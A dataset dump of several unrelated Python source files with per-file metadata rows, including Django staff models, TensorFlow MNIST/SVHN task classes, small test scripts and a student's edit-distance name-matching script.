| 68.581828 | 471 | 0.686088 | 15,915 | 129,071 | 5.341313 | 0.04656 | 0.063054 | 0.0775 | 0.070182 | 0.859212 | 0.853212 | 0.844248 | 0.829626 | 0.814862 | 0.790641 | 0 | 0.028274 | 0.165614 | 129,071 | 1,881 | 472 | 68.618288 | 0.761057 | 0.036801 | 0 | 0.385256 | 1 | 0 | 0.210575 | 0.137187 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003205 | false | 0 | 0.001282 | 0 | 0.005128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aab270916feaa8e6762dc89872b82e555985c062 | 37 | py | Python | jaseci_kit/jaseci_kit/t5_sum.py | ypkang/jaseci-1 | 8447b78bd788dbeb136fa818182f3028750f6130 | [
"MIT"
] | 6 | 2021-10-30T03:35:36.000Z | 2022-02-10T02:06:18.000Z | jaseci_kit/jaseci_kit/t5_sum.py | ypkang/jaseci-1 | 8447b78bd788dbeb136fa818182f3028750f6130 | [
"MIT"
] | 85 | 2021-10-29T22:47:39.000Z | 2022-03-31T06:11:52.000Z | jaseci_kit/jaseci_kit/t5_sum.py | ypkang/jaseci-1 | 8447b78bd788dbeb136fa818182f3028750f6130 | [
"MIT"
] | 12 | 2021-11-03T17:29:22.000Z | 2022-03-30T16:01:53.000Z | from .modules.t5_sum.t5_sum import *
| 18.5 | 36 | 0.783784 | 7 | 37 | 3.857143 | 0.714286 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.108108 | 37 | 1 | 37 | 37 | 0.757576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2aefb166a4dff2b78a2dbd4ffde206331f90bd9a | 7,174 | py | Python | staff/models.py | Boydlloyd/empmgt | de2af88e5f26f4c998fde991e5379a44333f0121 | [
"MIT"
] | null | null | null | staff/models.py | Boydlloyd/empmgt | de2af88e5f26f4c998fde991e5379a44333f0121 | [
"MIT"
] | null | null | null | staff/models.py | Boydlloyd/empmgt | de2af88e5f26f4c998fde991e5379a44333f0121 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User,Group
from school.models import District,Province,School
import datetime
class Staffmodule(models.Model):
datecreated= models.DateTimeField(auto_now_add=True)
class Myprofile(models.Model):
datecreated= models.DateTimeField(auto_now_add=True)
def current_date_time():
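    # Current timestamp formatted as 'YYYY-MM-DD HH:MM:SS'.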
    return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class Userlevel(models.Model):
user = models.ForeignKey(User,on_delete=models.DO_NOTHING)
userpic=models.ImageField("User Photo",upload_to='profile',default="profile/profile.jpg")
staff = models.IntegerField(default=0)
level= models.IntegerField()
description = models.CharField("Description",null=True,max_length=30)
def __str__(self):
return str(self.user)+"_Level "+str(self.level)
class Position(models.Model):
position = models.CharField("Staff Position",max_length=30,unique=True)
datecreated= models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
def __str__(self):
return self.position
class Title(models.Model):
title = models.CharField("Staff Title",max_length=30,unique=True)
datecreated= models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
def __str__(self):
return self.title
class Staff(models.Model):
GENDER = (('M', 'Male'),('F', 'Female'))
STATUS = (('Registered', 'Registered'),('Pending', 'Pending'),('Updated', 'Updated'),('Approved', 'Approved'),('Disapproved', 'Disapproved'))
tsnumber = models.CharField("TS Number",unique=True,null=True,max_length=8)
fname = models.CharField("First Name",max_length=20)
lname = models.CharField("Last Name",max_length=20)
mname = models.CharField("Middle Name",max_length=20,blank=True)
email = models.EmailField("Email",null=True,unique=True)
gender = models.CharField("Gender",choices=GENDER,max_length=1)
status = models.CharField("STATUS",choices=STATUS,max_length=11,default="Registered")
isconfirmed = models.BooleanField(default=False)
empnumber = models.CharField("Employee No.",unique=True,null=True,max_length=8)
mobile=models.CharField("Contact No.", max_length=20,blank=True,null=True,unique=True)
nrc = models.CharField("NRC",max_length=11,null=True)
birth_date = models.DateField("Date of Birth", auto_now=False, null=True)
first_appointment = models.DateField("Date of First Appointment", auto_now=False, null=True)
title = models.ForeignKey(Title,null=True,on_delete=models.SET_NULL)
position = models.ForeignKey(Position,null=True,on_delete=models.SET_NULL)
school = models.ForeignKey(School,null=True,on_delete=models.SET_NULL)
district = models.ForeignKey(District,null=True,on_delete=models.SET_NULL)
province = models.ForeignKey(Province,null=True,on_delete=models.SET_NULL)
datecreated= models.DateTimeField(auto_now_add=True)
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
search = models.CharField("Search",max_length=200,null=True)
comment = models.CharField("Comment",max_length=200,default=" ")
export_to_file=models.BooleanField(default=False)
qualifications = models.IntegerField(default=0)
profilepic=models.ImageField("Staff Photo",upload_to='profile',default="profile/profile.jpg")
is_updated=models.BooleanField(default=False)
is_active=models.BooleanField(default=False)
def __str__(self):
return self.fname +" "+self.lname+"_"+str(self.empnumber)
class Districtstaff(models.Model):
    GENDER = (('M', 'Male'), ('F', 'Female'))
    STATUS = (('Registered', 'Registered'), ('Updated', 'Updated'))
fname = models.CharField("First Name",max_length=20)
lname = models.CharField("Last Name",max_length=20)
mname = models.CharField("Middle Name",max_length=20,blank=True)
gender = models.CharField("Gender",choices=GENDER,max_length=1,null=True)
isconfirmed = models.BooleanField(default=False)
empnumber = models.CharField("Employee No.",unique=True,null=True,max_length=8)
email = models.EmailField("Email",null=True,unique=True)
mobile=models.CharField("Contact No.", max_length=20,blank=True,null=True,unique=True)
nrc = models.CharField("NRC",max_length=11,null=True)
birth_date = models.DateField("Date of Birth", auto_now=False, null=True)
first_appointment = models.DateField("Date of First Appointment", auto_now=False, null=True)
title = models.ForeignKey(Title,null=True,on_delete=models.SET_NULL)
position = models.ForeignKey(Position,null=True,on_delete=models.SET_NULL)
district = models.ForeignKey(District,on_delete=models.DO_NOTHING)
province = models.ForeignKey(Province,on_delete=models.DO_NOTHING)
datecreated= models.DateTimeField(auto_now_add=True)
status = models.CharField("STATUS",choices=STATUS,max_length=11,default="Registered")
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
search = models.CharField("Search",max_length=200,null=True)
export_to_file=models.BooleanField(default=False)
is_updated=models.BooleanField(default=False)
profilepic=models.ImageField("Staff Photo",upload_to='profile',default="profile/profile.jpg")
def __str__(self):
return self.fname +" "+self.lname+"_"+str(self.empnumber)
class Provincialstaff(models.Model):
GENDER = (('M', 'Male'),('F', 'Female'))
    STATUS = (('Registered', 'Registered'), ('Updated', 'Updated'))
fname = models.CharField("First Name",max_length=20)
lname = models.CharField("Last Name",max_length=20)
mname = models.CharField("Middle Name",max_length=20,blank=True)
gender = models.CharField("Gender",choices=GENDER,max_length=1,null=True)
isconfirmed = models.BooleanField(default=False)
empnumber = models.CharField("Employee No.",unique=True,null=True,max_length=15)
email = models.EmailField("Email",null=True,unique=True)
mobile=models.CharField("Contact No.", max_length=20,blank=True,null=True,unique=True)
nrc = models.CharField("NRC",max_length=11,null=True)
birth_date = models.DateField("Date of Birth", auto_now=False, null=True)
first_appointment = models.DateField("Date of First Appointment", auto_now=False, null=True)
title = models.ForeignKey(Title,null=True,on_delete=models.SET_NULL)
position = models.ForeignKey(Position,null=True,on_delete=models.SET_NULL)
province = models.ForeignKey(Province,on_delete=models.DO_NOTHING)
datecreated= models.DateTimeField(auto_now_add=True)
status = models.CharField("STATUS",choices=STATUS,max_length=11,default="Registered")
author = models.ForeignKey(User,on_delete=models.DO_NOTHING)
search = models.CharField("Search",max_length=200,null=True)
export_to_file=models.BooleanField(default=False)
is_updated=models.BooleanField(default=False)
profilepic=models.ImageField("Staff Photo",upload_to='profile',default="profile/profile.jpg")
def __str__(self):
return self.fname +" "+self.lname+"_"+str(self.empnumber)
| 51.985507 | 145 | 0.740591 | 935 | 7,174 | 5.534759 | 0.125134 | 0.05256 | 0.048696 | 0.057971 | 0.827633 | 0.822802 | 0.815266 | 0.796135 | 0.764831 | 0.743575 | 0 | 0.010605 | 0.11932 | 7,174 | 137 | 146 | 52.364964 | 0.808484 | 0 | 0 | 0.669492 | 0 | 0 | 0.10902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059322 | false | 0 | 0.033898 | 0.050847 | 0.974576 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2d96701a84b00ea1861bc2ac8beddac02fc332d6 | 92 | py | Python | tests/strings/join.py | Slater-Victoroff/pyjaco | 89c4e3c46399c5023b0e160005d855a01241c58a | [
"MIT"
] | 50 | 2015-03-24T19:45:34.000Z | 2022-02-20T04:34:26.000Z | tests/strings/join.py | MoonStarCZW/py2js | 6cda2b1d3cf281a5ca92c18b08ac9fa1c389cbea | [
"MIT"
] | 2 | 2017-02-26T09:43:07.000Z | 2017-03-06T20:04:24.000Z | tests/strings/join.py | Slater-Victoroff/pyjaco | 89c4e3c46399c5023b0e160005d855a01241c58a | [
"MIT"
] | 11 | 2016-03-29T06:17:07.000Z | 2021-12-11T12:57:41.000Z | a = ["a", "b", "c"]
print "".join(a)
print " ".join(a)
print "x".join(a)
print "x ".join(a)
| 15.333333 | 19 | 0.5 | 18 | 92 | 2.555556 | 0.333333 | 0.434783 | 0.652174 | 0.652174 | 0.586957 | 0.586957 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163043 | 92 | 5 | 20 | 18.4 | 0.597403 | 0 | 0 | 0.8 | 0 | 0 | 0.076087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
2dbf97af5113bb46f79a8427aa95e9774d1c3797 | 8,663 | py | Python | tasks/mnist.py | samiraabnar/DistillingInductiveBias | 962f87e7d38a3d255846432286e048d176ed7a5d | [
"MIT"
] | 10 | 2020-07-04T09:11:36.000Z | 2021-12-16T13:06:35.000Z | tasks/mnist.py | samiraabnar/DistillingInductiveBias | 962f87e7d38a3d255846432286e048d176ed7a5d | [
"MIT"
] | null | null | null | tasks/mnist.py | samiraabnar/DistillingInductiveBias | 962f87e7d38a3d255846432286e048d176ed7a5d | [
"MIT"
] | 3 | 2021-07-09T16:24:07.000Z | 2022-02-07T15:49:05.000Z | from distill.distill_util import DistillLoss, get_probs
from tasks.task import Task
import tensorflow as tf
import tensorflow_datasets as tfds
from tf2_models.metrics import ClassificationLoss
from tfds_data.aff_nist import AffNist
class Mnist(Task):
def __init__(self, task_params, name='mnist', data_dir='mnist_data'):
self.databuilder = tfds.builder("mnist")
super(Mnist, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=None)
def vocab_size(self):
return 28*28
def output_size(self):
return 10
def get_loss_fn(self):
return ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64))
def get_distill_loss_fn(self, distill_params):
return DistillLoss(tmp=distill_params.distill_temp)
def get_probs_fn(self):
return get_probs
def metrics(self):
return [ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64)),
tf.keras.metrics.SparseCategoricalAccuracy()]
@property
def padded_shapes(self):
# To make sure we are not using this!
raise NotImplementedError
def convert_examples(self, examples):
return tf.cast(examples['image'], dtype=tf.float32)/255, tf.cast(examples['label'], dtype=tf.int32)
def setup_datasets(self):
self.info = self.databuilder.info
self.n_train_batches = int(
self.info.splits['train'].num_examples / self.task_params.batch_size)
self.n_test_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.n_valid_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.databuilder.download_and_prepare(download_dir=self.data_dir)
self.test_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.test_dataset, tf.data.Dataset)
self.test_dataset = self.test_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.test_dataset = self.test_dataset.repeat()
self.test_dataset = self.test_dataset.batch(
batch_size=self.task_params.batch_size)
self.test_dataset = self.test_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.train_dataset = self.databuilder.as_dataset(split="train")
assert isinstance(self.train_dataset, tf.data.Dataset)
self.train_dataset = self.train_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.train_dataset = self.train_dataset.repeat()
self.train_dataset = self.train_dataset.shuffle(1024)
self.train_dataset = self.train_dataset.batch(
batch_size=self.task_params.batch_size)
# self.train_dataset = self.train_dataset.cache()
self.train_dataset = self.train_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.valid_dataset, tf.data.Dataset)
self.valid_dataset = self.valid_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.valid_dataset.repeat()
self.valid_dataset = self.valid_dataset.batch(
batch_size=self.task_params.batch_size)
self.valid_dataset = self.valid_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
class AffNistTask(Task):
def __init__(self, task_params, name='aff_nist',data_dir='data', builder_cls=AffNist):
super(AffNistTask, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=builder_cls)
def input_shape(self):
"""
To be used when calling model.build(input_shape)
    :return: [batch_size, height, width, channels]
"""
return [None, 32, 32, 1]
def vocab_size(self):
return 40*40
def output_size(self):
return 10
def get_loss_fn(self):
return ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64))
def get_distill_loss_fn(self, distill_params):
return DistillLoss(tmp=distill_params.distill_temp)
def get_probs_fn(self):
return get_probs
def metrics(self):
return [ClassificationLoss(global_batch_size=self.task_params.batch_size,
padding_symbol=tf.constant(-1, dtype=tf.int64)),
tf.keras.metrics.SparseCategoricalAccuracy()]
@property
def padded_shapes(self):
# To make sure we are not using this!
raise NotImplementedError
def convert_examples(self, examples):
return tf.cast(examples['image'], dtype=tf.float32)/255, tf.cast(examples['label'], dtype=tf.int32)
def setup_datasets(self):
self.info = self.databuilder.info
self.n_train_batches = int(
self.info.splits['train'].num_examples / self.task_params.batch_size)
self.n_test_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.n_valid_batches = int(
self.info.splits['test'].num_examples / self.task_params.batch_size)
self.test_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.test_dataset, tf.data.Dataset)
self.test_dataset = self.test_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.test_dataset = self.test_dataset.repeat()
self.test_dataset = self.test_dataset.batch(
batch_size=self.task_params.batch_size)
self.test_dataset = self.test_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.train_dataset = self.databuilder.as_dataset(split="train")
assert isinstance(self.train_dataset, tf.data.Dataset)
self.train_dataset = self.train_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.train_dataset = self.train_dataset.repeat()
self.train_dataset = self.train_dataset.shuffle(1024)
self.train_dataset = self.train_dataset.batch(
batch_size=self.task_params.batch_size)
# self.train_dataset = self.train_dataset.cache()
self.train_dataset = self.train_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.databuilder.as_dataset(split="test")
assert isinstance(self.valid_dataset, tf.data.Dataset)
self.valid_dataset = self.valid_dataset.map(map_func=lambda x: self.convert_examples(x),
num_parallel_calls=tf.data.experimental.AUTOTUNE)
self.valid_dataset = self.valid_dataset.repeat()
self.valid_dataset = self.valid_dataset.batch(
batch_size=self.task_params.batch_size)
self.valid_dataset = self.valid_dataset.prefetch(
tf.data.experimental.AUTOTUNE)
class Svhn(Mnist):
def __init__(self, task_params, name='svhn', data_dir='mnist_data'):
self.databuilder = tfds.builder("svhn_cropped")
super(Mnist, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=None)
def vocab_size(self):
return 32 * 32
def input_shape(self):
"""
To be used when calling model.build(input_shape)
    :return: [batch_size, height, width, channels]
"""
return [None, 32, 32, 1]
class Mnist40(Mnist):
def __init__(self, task_params, name='mnist40', data_dir='mnist_data'):
self.databuilder = tfds.builder("mnist")
super(Mnist, self).__init__(task_params=task_params, name=name,
data_dir=data_dir,
builder_cls=None)
def vocab_size(self):
return 40 * 40
def output_size(self):
return 10
def input_shape(self):
"""
To be used when calling model.build(input_shape)
    :return: [batch_size, height, width, channels]
"""
    return [None, 40, 40, 1]  # images are padded from 28x28 to 40x40 in convert_examples below
def convert_examples(self, examples):
pad_length = int((40 - 28) / 2)
return tf.pad(tf.cast(examples['image'], dtype=tf.float32) / 255,
([pad_length, pad_length], [pad_length, pad_length],
[0, 0])), tf.cast(
examples['label'], dtype=tf.int32)
| 38.674107 | 103 | 0.683597 | 1,130 | 8,663 | 4.981416 | 0.112389 | 0.078167 | 0.079588 | 0.054006 | 0.927163 | 0.922366 | 0.915971 | 0.889501 | 0.875644 | 0.875644 | 0 | 0.01316 | 0.210551 | 8,663 | 223 | 104 | 38.847534 | 0.809914 | 0.053792 | 0 | 0.84375 | 0 | 0 | 0.019948 | 0 | 0 | 0 | 0 | 0 | 0.0375 | 1 | 0.18125 | false | 0 | 0.0375 | 0.10625 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
2dc707dd567fdfd692f64c153d4c868f69ca1e8d | 171 | py | Python | testing/andandorandnot.py | worldwalker2000/pyxx | 8c6f129042241ca8b0eb274a69ca56b2ac1261cb | [
"MIT"
] | 4 | 2021-12-29T22:44:57.000Z | 2022-01-21T17:27:35.000Z | testing/andandorandnot.py | worldwalker2000/pyxx | 8c6f129042241ca8b0eb274a69ca56b2ac1261cb | [
"MIT"
] | 1 | 2022-03-09T20:56:56.000Z | 2022-03-09T21:57:04.000Z | testing/andandorandnot.py | worldwalker2000/pyxx | 8c6f129042241ca8b0eb274a69ca56b2ac1261cb | [
"MIT"
] | null | null | null | if not not True :
print(True)
else :
print(False)
if True or False :
print(True)
else :
print(False)
if True and True :
print(True)
else :
print(False)
| 8.55 | 18 | 0.625731 | 27 | 171 | 3.962963 | 0.296296 | 0.252336 | 0.364486 | 0.504673 | 0.831776 | 0.831776 | 0.542056 | 0 | 0 | 0 | 0 | 0 | 0.269006 | 171 | 19 | 19 | 9 | 0.856 | 0 | 0 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
fad033d52c0bfec1b75a37a998fbfe84f93d4e4a | 43,912 | py | Python | COMP90049/summer_pre/COMP90049-Knowledge-Technologies-master 2/Assignment/assignment1/assignment1.py | peiyong-addwater/2019SM1 | 6745cb0a12a751bb445e57dfdd5014c87783faad | [
"MIT"
] | null | null | null | COMP90049/summer_pre/COMP90049-Knowledge-Technologies-master 2/Assignment/assignment1/assignment1.py | peiyong-addwater/2019SM1 | 6745cb0a12a751bb445e57dfdd5014c87783faad | [
"MIT"
] | null | null | null | COMP90049/summer_pre/COMP90049-Knowledge-Technologies-master 2/Assignment/assignment1/assignment1.py | peiyong-addwater/2019SM1 | 6745cb0a12a751bb445e57dfdd5014c87783faad | [
"MIT"
] | null | null | null | '''
Date: 19/3/2017
Author: Ao Li
Work: Comp90049 Knowledge Technologies Assignment 1
Goal: Achieve Approximate Matching
'''
import Levenshtein
import nltk
import soundex
import fuzzy
# (Levenshtein, nltk, soundex and fuzzy are only exercised by the optional,
#  commented-out methods further down.)
''' Open the Files:
f1 ---> test.txt: A list of 2K names in the Persian script, without their Latin equivalent
f2 ---> train.txt: A list of 13K names in the Persian script, with their Latin equivalent
f3 ---> names.txt: A list of 26K names in the Latin script (Include all of the Persian names)
'''
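# A quick sketch (variable names here are illustrative, not from the script) of how
# one train.txt line is laid out -- Persian name, a tab, then the Latin equivalent:
#   persian, latin = line.rstrip('\n').split('\t')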
f1 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test.txt')
f2 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/train.txt')
# f2 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test2Gram1.txt')
f3 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/names.txt')
# f3 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test2Gram.txt')
# f4 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_global_myself.txt','w+')
# f5 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_local_myself.txt','w+')
# f6 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_global_system.txt','w+')
# f7 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_N-Gram.txt','w+')
# f7 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/test2Gram2.txt','w+')
f8 = open('/Users/admin/Desktop/Knowledge Technology/Assignment/assignment1/2017S1-90049P1-data/results_100TrainedLinesMatrix.txt','w+')
# Using Global Edit Distance Method:
''' Set parameters:
Parameters [m, i, d, r] are specified in each para list below:
m ---> Match
i ---> Insertion
d ---> Deletion
r ---> Replace
'''
# "Normal" Distance:
para1 = [ 1,-1,-1,-1 ]
# Levenshtein Distance:
para2 = [ 0, 1, 1, 1 ]
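# A minimal, self-contained sketch (illustrative only; the script relies on the
# inline DP loops further down) of how the [m, i, d, r] weights drive a global
# edit-distance table. With similarity-style weights such as para1 the recurrence
# maximises; with cost-style weights such as para2 it would minimise instead.
def global_edit_distance(s, t, para):
    rows, cols = len(s) + 1, len(t) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(1, rows):
        d[i][0] = d[i - 1][0] + para[2]   # delete each leading char of s
    for j in range(1, cols):
        d[0][j] = d[0][j - 1] + para[1]   # insert each leading char of t
    for i in range(1, rows):
        for j in range(1, cols):
            sub = para[0] if s[i - 1] == t[j - 1] else para[3]
            d[i][j] = max(d[i - 1][j - 1] + sub,   # match / replace
                          d[i - 1][j] + para[2],   # deletion
                          d[i][j - 1] + para[1])   # insertion
    return d[rows - 1][cols - 1]
# e.g. global_edit_distance('crat', 'cart', para1) -> 1 (three matches, two gap ops)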
'''
pNames: represents the list of Persian Names
lNames: represents the list of Latin Names
'''
# pNames = f2.readlines()
# lNames = f3.readlines()
# for pName in pNames:
#
# maxDistance = -10000
# matchName = ""
#
# pName = pName.replace(pName," "+pName)
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
#
# for lName in lNames:
#
# lName = lName.replace(lName," "+lName)
# index = lName.find('\n')
# lName = lName[0:index]
#
# #Initiate the First Row & Column in Distance Array:
# lenP = len( pName )
# lenL = len( lName )
#
# distanceG = [[0 for i in range(lenL) ] for i in range(lenP)]
#
# for i in range(0,lenL):
# distanceG[ 0 ][ i ] = i * para1[ 2 ]
# for i in range(0,lenP):
# distanceG[ i ][ 0 ] = i * para1[ 1 ]
#
# for i in range(1,lenP):
# for j in range(1,lenL):
# if pName[ i ] == lName[ j ]:
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + para1[0],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2]
# )
# else:
# x = ord( pName[i] )
# y = ord( lName[j] )
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + ori_blosum62[ x ][ y ],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2]
# )
#
# if distanceG[ lenP-1 ][ lenL-1 ] > maxDistance:
# maxDistance = distanceG[ lenP-1 ][ lenL-1 ]
# matchName = lName
#
# matchName = matchName[1:]
# pName = pName[1:].upper()
# print pName+ "\t" + matchName
# f8.write(pName+ "\t" + matchName + "\n")
# f8.close()
#
# Using Local Edit Distance Method self-wirte (Optional):
# for pName in pNames:
#
# maxDistance = 0
# matchName = ""
#
# pName = pName.replace(pName," "+pName)
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
#
# for lName in lNames:
#
# lName = lName.replace(lName," "+lName)
# index = lName.find('\n')
# lName = lName[0:index]
#
# #Initiate the First Row & Column in Distance Array:
# lenP = len( pName )
# lenL = len( lName )
# maxDistanceTemp = 0
# distanceG = [[0 for i in range(lenL) ] for i in range(lenP)]
#
# for i in range(0,lenL):
# distanceG[ 0 ][ i ] = 0
# for i in range(0,lenP):
# distanceG[ i ][ 0 ] = 0
#
# for i in range(1,lenP):
# for j in range(1,lenL):
# if pName[ i ] == lName[ j ]:
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + para1[0],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2],
# 0
# )
# else:
# distanceG[ i ][ j ] = max(
# distanceG[ i-1 ][ j-1 ] + para1[3],
# distanceG[ i-1 ][ j ] + para1[1],
# distanceG[ i ][ j-1 ] + para1[2],
# 0
# )
# if distanceG[ i ][ j ] > maxDistanceTemp:
# maxDistanceTemp = distanceG[ i ][ j ]
#
# if maxDistanceTemp > maxDistance:
# maxDistance = maxDistanceTemp
# matchName = lName
#
# matchName = matchName[1:]
# pName = pName[1:].upper()
# print pName,"\t",matchName,"\t",maxDistance
# f5.write(pName+ "\t" + matchName + "\n")
# f5.close()
# Using Global Edit Distance system method (Option)
# for pName in pNames:
# dis = 1000000
# matchName = ''
#
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
# # print pName
# for lName in lNames:
# index = lName.find('\n')
# lName = lName[0:index]
# disTemp = Levenshtein.distance(lName,pName)
# if disTemp < dis:
# dis = disTemp
# matchName = lName
# # print matchName
# f6.write(pName+ "\t" + matchName + "\n")
# f6.close()
# Using N-Gram Method(Optional):
# for pName in pNames:
# index = pName.find('\t')
# pName = pName[0:index]
# pName = pName.lower()
# pName = pName.replace(pName,'#'+pName+'#')
# pName_2gram = list( nltk.bigrams( pName ) )
# gramDistance = 100000
# matchName = ''
# pLen = len(pName_2gram)
#
# for lName in lNames:
# index = lName.find('\n')
# lName = lName[0:index]
# lName = lName.replace(lName,'#'+lName+'#')
# lName_2gram = list( nltk.bigrams( lName ) )
# lLen = len(lName_2gram)
# visit = [0 for i in range( lLen )]
# intersectionTempNum = 0
# for i in range( pLen ):
# for j in range( lLen ):
# if pName_2gram[i] == lName_2gram[j] and visit[j] != 1:
# intersectionTempNum += 1
# visit[ j ] = 1
#
# gramTempDistance = pLen + lLen - 2*intersectionTempNum
# if gramTempDistance < gramDistance:
# gramDistance = gramTempDistance
# matchName = lName
#
# pName = pName[1:len(pName)-1]
# matchName = matchName[1:len(matchName)-1]
# print pName+ "\t" + matchName
# f7.write(pName+ "\t" + matchName + "\n")
# f7.close()
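# A runnable sketch (illustrative names, not part of the original script) of the
# 2-gram distance computed above: |G(s)| + |G(t)| - 2*|G(s) intersect G(t)|, with
# '#' padding at both ends of each name.
def bigram_distance(s, t):
    def grams(w):
        w = '#' + w + '#'
        return [w[k:k + 2] for k in range(len(w) - 1)]
    gs, gt = grams(s), grams(t)
    used = [False] * len(gt)
    common = 0
    for g in gs:                       # count the multiset intersection of bigrams
        for j, h in enumerate(gt):
            if g == h and not used[j]:
                used[j] = True
                common += 1
                break
    return len(gs) + len(gt) - 2 * common
# e.g. bigram_distance('nelson', 'neilsen') gives a small value for similar names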
# Using Soundex(Optional):
# soundex = fuzzy.Soundex(4)
# print soundex(a)
# print soundex(b)
# soundex1 = soundex.getInstance()
# print soundex1.soundex(a)
# print soundex1.soundex(b)
# print soundex1.compare(a, b)
# print soundex1.compare(a, c)
# print soundex1.compare(b, c)
